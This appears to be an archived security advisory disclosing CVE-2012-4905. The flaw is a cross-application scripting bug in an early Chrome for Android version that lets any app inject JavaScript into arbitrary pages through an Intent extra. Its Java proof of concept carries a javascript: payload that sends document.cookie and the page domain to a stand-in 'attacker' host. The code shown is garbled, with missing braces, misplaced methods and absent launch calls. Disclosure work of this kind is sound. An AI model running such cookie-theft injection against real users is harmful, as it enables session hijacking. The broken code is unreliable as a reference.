[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Chrome for Android - UXSS via com.android.browser.application_id Intent extra

CVE Number:         CVE-2012-4905
Title:              Chrome for Android - UXSS via com.android.browser.application_id Intent extra
Affected Software:  Confirmed on Chrome for Android v18.0.1025123
Credit:             Takeshi Terada
Issue Status:       v18.0.1025308 was released which fixes this vulnerability

  By sending a crafted Intent to Chrome for Android, malicious Android apps can
  inject javascript into arbitrary Web pages rendered in Chrome. Such kind of
  UXSS-like vulnerabilities is often called Cross-Application Scripting.

  When other Android apps send an Intent with javascript: URI to Chrome for
  Android (v18.0.1025123), Chrome opens a new tab and execute the JavaScript
  code in the context of the blank domain. Probably this is a countermeasure
  against UXSS attacks.

  However, this can be bypassed by an Intent with Extra data as below:

  intent.putExtra("com.android.browser.application_id", "com.android.chrome");

  With an Intent that contains such Extra data, Chrome loads javascript: URI
  (written in the Intent) in the current foreground tab, not in a blank tab.

  This enables malicious Android apps to execute arbitrary JavaScript code in
  arbitrary domains on Chrome. As a result, other apps are able to steal Cookies
  and so on.

Proof of Concept:
  package jp.mbsd.terada.attackchrome1;
  import android.app.Activity;
  import android.os.Bundle;
  import android.content.Intent;
  import android.net.Uri;
  public class Main extends Activity {
      public void onCreate(Bundle savedInstanceState) {
      // get intent to invoke the chrome app
      public Intent getIntentForChrome(String url) {
          Intent intent = new Intent("android.intent.action.VIEW");
          intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
          return intent;
      public void doit() {
          try {
              // At first, force the chrome app to open a target Web page
              Intent intent1 = getIntentForChrome("http://www.google.com/1";);
              // wait a few seconds
              // JS code to inject into the target (www.google.com)
              String jsURL = "javascript:var e=encodeURIComponent,img=document.createElement('img');"
                  + "img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domain);"
                  + "document.body.appendChild(img);";
              Intent intent2 = getIntentForChrome(jsURL);
              // Trick to prevent Chrome from opening the JS URL in a different tab
              intent2.putExtra("com.android.browser.application_id", "com.android.chrome");
              // Inject JS into the target Web page
          catch (Exception e) {}

  2012/07/07  Reported to Google security team.
  2012/09/12  Vender announced v18.0.1025308
  2013/01/07  Disclosure of this advisory

  Upgrade to the latest version.